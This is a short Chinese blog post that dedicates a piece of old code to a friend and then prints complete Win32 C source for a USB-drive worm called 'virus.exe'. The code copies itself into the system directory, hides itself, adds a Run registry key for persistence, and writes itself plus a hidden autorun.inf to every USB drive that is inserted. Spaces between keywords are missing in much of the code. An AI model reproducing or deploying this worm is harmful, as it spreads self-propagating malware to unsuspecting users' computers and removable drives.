U disk virus
刺猬@/littlehedgehog
谨以此文送给刚哥,并预祝他在win32的道路上成功!
这篇代码还是去年写的了,本来这个学期还打算找时间把它加注下,呵呵,回头来看基本上都忘了。还是等到刚哥有时间加注吧,恐怕我以后很难再回到Windows平台了。
// 谨以此文送给刚哥,并预祝他在win32的道路上成功!
#include < windows.h >
#include < dbt.h >
#include < stdio.h >
#include < shlwapi.h >
#pragma comment(lib,"shlwapi.lib")
#define TIMER1
LRESULTCALLBACKWndProc(HWND,UINT,WPARAM,LPARAM);
BOOLGetSystemPath();
BOOLGetSelfPath();
BOOLCopyToSystemPath();
BOOLSetRegAutoRun();
BOOLSetAttributes(TCHAR * path);
VOIDRunOnCreate(HWND);
char DriveMark(ULONG);
VOIDOnDeviceChange(HWND,WPARAM,LPARAM);
VOIDCopyToUDiskPath();
VOIDSetDiscAutoRun();
TCHARg_szExePath[MAX_PATH];
TCHARg_szSysPath[MAX_PATH];
TCHARg_szSysExePath[MAX_PATH];
TCHARg_szUdisk[ 2 ];
TCHAR * g_szExeName = " virus.exe " ;
TCHAR * g_szAutoRun = " autorun.inf " ;
int WINAPIWinMain(HINSTANCEhInstance,HINSTANCEhPrevInstance,
PSTRszCmdLine, int iCmdShow)
... {
staticTCHARszAppName[]=TEXT("HelloWin");
WNDCLASSwndclass;
wndclass.style=WS_EX_TRANSPARENT;
wndclass.lpfnWndProc=WndProc;
wndclass.cbClsExtra=0;
wndclass.cbWndExtra=0;
wndclass.hInstance=hInstance;
wndclass.hIcon=LoadIcon(NULL,IDI_APPLICATION);
wndclass.hCursor=LoadCursor(NULL,IDC_ARROW);
wndclass.hbrBackground=(HBRUSH)GetStockObject(WHITE_BRUSH);
wndclass.lpszMenuName=NULL;
wndclass.lpszClassName=szAppName;
if(!RegisterClass(&wndclass))
...{
MessageBox(NULL,TEXT("RegisterClassFail!"),
szAppName,MB_ICONERROR);
return0;
}
HWNDhwnd=CreateWindow(szAppName,
0,
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,
CW_USEDEFAULT,
CW_USEDEFAULT,
CW_USEDEFAULT,
NULL,
NULL,
hInstance,
NULL);
ShowWindow(hwnd,iCmdShow);
UpdateWindow(hwnd);
MSGmsg;
while(GetMessage(&msg,NULL,0,0))
...{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
returnmsg.wParam;
}
LRESULTCALLBACKWndProc(HWNDhwnd,UINTmessage,WPARAMwParam,LPARAMlParam)
... {
switch(message)
...{
caseWM_CREATE:
RunOnCreate(hwnd);
break;
caseWM_DEVICECHANGE:
OnDeviceChange(hwnd,wParam,lParam);
break;
caseWM_TIMER:
SendMessage(hwnd,WM_DEVICECHANGE,0,0);
break;
caseWM_DESTROY:
KillTimer(hwnd,TIMER);
CloseHandle(hwnd);
PostQuitMessage(0);
return0;
default:
returnDefWindowProc(hwnd,message,wParam,lParam);
}
returnDefWindowProc(hwnd,message,wParam,lParam);
}
BOOLGetSystemPath()
... {
returnGetSystemDirectory(g_szSysPath,MAX_PATH);
}
BOOLGetSelfPath()
... {
returnGetModuleFileName(NULL,g_szExePath,MAX_PATH);
}
BOOLCopyToSystemPath()
... {
lstrcpy(g_szSysExePath,g_szSysPath);
lstrcat(g_szSysExePath,"/");
lstrcat(g_szSysExePath,g_szExeName);
returnCopyFile(g_szExePath,g_szSysExePath,FALSE);
}
BOOLSetRegAutoRun()
... {
HKEYhkey;
if(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE/MICROSOFT/Windows/CurrentVersion/Run",&hkey)==ERROR_SUCCESS)
...{
if(RegSetValueEx(hkey,g_szExeName,0,REG_SZ,(BYTE*)g_szSysExePath,lstrlen(g_szSysExePath))==ERROR_SUCCESS)
...{
RegCloseKey(hkey);
returnTRUE;
}
}
returnFALSE;
}
BOOLSetAttributes(TCHAR * path)
... {
returnSetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
VOIDRunOnCreate(HWNDhwnd)
... {
GetSystemPath();
GetSelfPath();
if(g_szExePath[0]==g_szSysPath[0])
...{
SetTimer(hwnd,TIMER,8000,0);
}
else
...{
CopyToSystemPath();
SetAttributes(g_szSysExePath);
SetRegAutoRun();
WinExec(g_szSysExePath,SW_HIDE);
SendMessage(hwnd,WM_DESTROY,0,0);
}
}
VOIDOnDeviceChange(HWNDhwnd,WPARAMwParam,LPARAMlParam)
... {
PDEV_BROADCAST_HDRpbdh=(PDEV_BROADCAST_HDR)lParam;
switch(wParam)
...{
caseDBT_DEVICEARRIVAL:
if(pbdh->dbch_devicetype==DBT_DEVTYP_VOLUME)
...{
DEV_BROADCAST_VOLUME*pdbv=(DEV_BROADCAST_VOLUME*)pbdh;
g_szUdisk[0]=DriveMark(pdbv->dbcv_unitmask);
g_szUdisk[1]=':';
CopyToUDiskPath();
SetDiscAutoRun();
}
break;
}
}
char DriveMark(ULONGunitmask)
... {
chari;
for(i=0;i<26;++i)
...{
if(unitmask&0x1)
break;
unitmask=unitmask>>1;
}
return(i+'A');
}
VOIDCopyToUDiskPath()
... {
TCHARt_szUDiscExePath[MAX_PATH];
lstrcpy(t_szUDiscExePath,g_szUdisk);
lstrcat(t_szUDiscExePath,"/");
lstrcat(t_szUDiscExePath,g_szExeName);
CopyFile(g_szExePath,t_szUDiscExePath,FALSE);
SetFileAttributes(t_szUDiscExePath,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
VOIDSetDiscAutoRun()
... {
FILE*fp;
chart_buffer[MAX_PATH];
chart_path[MAX_PATH];
memset(t_buffer,'0',MAX_PATH);
memset(t_path,'0',MAX_PATH);
strcpy(t_buffer,"[autorun] open=");
strcat(t_buffer,g_szExeName);
strcat(t_buffer," shell/open=打开(&O) shell/open/Command=");
strcat(t_buffer,g_szExeName);
strcat(t_buffer," ");
strcat(t_buffer,"shell/open/Default=1 shell/explore=资源管理器(&X) shell/explore/Command=");
strcat(t_buffer,g_szExeName);
strcpy(t_path,g_szUdisk);
strcat(t_path,"/");
strcat(t_path,"autorun.inf");
if(PathFileExists(t_path))
...{
SetFileAttributes(t_path,FILE_ATTRIBUTE_NORMAL);
DeleteFile(t_path);
}
if(fp=fopen(t_path,"w+"))
...{
fwrite(t_buffer,1,strlen(t_buffer)+1,fp);
}
fclose(fp);
SetFileAttributes(t_path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY);
}